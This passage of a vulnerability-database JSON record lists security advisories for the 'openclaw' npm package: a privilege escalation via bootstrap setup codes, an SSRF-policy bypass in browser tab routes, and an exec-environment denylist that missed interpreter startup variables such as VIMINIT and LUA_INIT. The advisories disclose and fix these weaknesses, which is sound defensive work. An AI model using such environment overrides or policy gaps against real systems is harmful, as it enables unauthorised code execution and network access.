gg9v-mgcp-v6m7","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"9.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:48:41Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gg9v-mgcp-v6m7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41386","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41386"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-unbound-bootstrap-setup-codes","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N"},{"value":"9.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC
:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:48:41Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-unbound-bootstrap-setup-codes"},{"reference_url":"https://github.com/advisories/GHSA-gg9v-mgcp-v6m7","reference_id":"GHSA-gg9v-mgcp-v6m7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gg9v-mgcp-v6m7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-
xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-
2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-
nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-
cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-41386","GHSA-gg9v-mgcp-v6m7"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zpb1-e3g9-vkbh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89719?format=json","vulnerability_id":"
VCID-zpte-tgt5-wqcm","summary":"OpenClaw: Browser tabs action select and close routes bypassed SSRF policy\n## Summary\n\nBrowser tabs action select and close routes bypassed SSRF policy.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe browser `/tabs/action` select and close branches could operate on targets without enforcing configured browser SSRF policy, weakening tab-level navigation protections.\n\n## Technical Details\n\nThe fix enforces browser SSRF policy in the select and close tab-action branches.\n\n## Fix\n\nThe issue was fixed in #63332. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `48c0347921b7e9438af0312968fc360ca88023f3`\n- PR: #63332\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @tdjackey for reporting this 
issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42439","reference_id":"","reference_type":"","scores":[{"value":"0.00031","scoring_system":"epss","scoring_elements":"0.09559","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11153","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11187","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-42439"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/48c03479211799ec3c1305ad69037cea25ba0e1e","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/48c03479211799ec3c1305ad69037cea25ba0e1e"},{"reference_url":"https://github.com/openclaw/openclaw/commit/48c0347921b7e9438af0312968fc360ca88023f3","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","s
coring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T14:03:51Z/"}],"url":"https://github.com/openclaw/openclaw/commit/48c0347921b7e9438af0312968fc360ca88023f3"},{"reference_url":"https://github.com/openclaw/openclaw/pull/63332","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/63332"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rj2p-j66c-mgqh","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T14:03:51Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rj2p-j66c-mgqh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42439","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","s
coring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-42439"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-browser-tabs-action-routes","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:H/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T14:03:51Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-ssrf-policy-bypass-in-browser-tabs-action-routes"},{"reference_url":"https://github.com/advisories/GHSA-rj2p-j66c-mgqh","reference_id":"GHSA-rj2p-j66c-mgqh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rj2p-j66c-mgqh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VC
ID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-42439","GHSA-rj2p-j66c-mgqh"],"risk_score":3.9,"exploitability":"0.5","weighted_severity":"7.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-zpte-tgt5-wqcm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89586?format=json","vulnerability_id":"VCID-zu4s-jnn3-1kd8","summary":"OpenClaw: Exec environment denylist missed high-risk interpreter startup variables\n## Summary\n\nExec environment denylist missed high-risk interpreter startup variables.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe exec environment policy missed interpreter startup 
variables such as `VIMINIT`, `EXINIT`, `LUA_INIT`, and `HOSTALIASES`, allowing operator-supplied environment overrides to influence downstream execution or network behavior.\n\n## Technical Details\n\nThe fix expands the host environment security policy denylist to cover these and related high-risk environment variables, with regression coverage.\n\n## Fix\n\nThe issue was fixed in #63277. The first stable tag containing the fix is `v2026.4.10`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `2d126fc62343a7b6895351f96e4e1474bc358140`\n- PR: #63277\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.10 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43584","reference_id":"","reference_type":"","scores":[{"value":"0.0012","scoring_system":"epss","scoring_elements":"0.30608","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0012","scoring_system":"epss","scoring_elements":"0.30575","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00139","scoring_system":"epss","scoring_elements":"0.33672","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43584"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2d126fc62343a7b6895351f96e4e1474bc358140","reference_id":"","reference_type":"","scores":[{
"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:02:18Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2d126fc62343a7b6895351f96e4e1474bc358140"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-vfp4-8x56-j7c5","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:02:18Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GH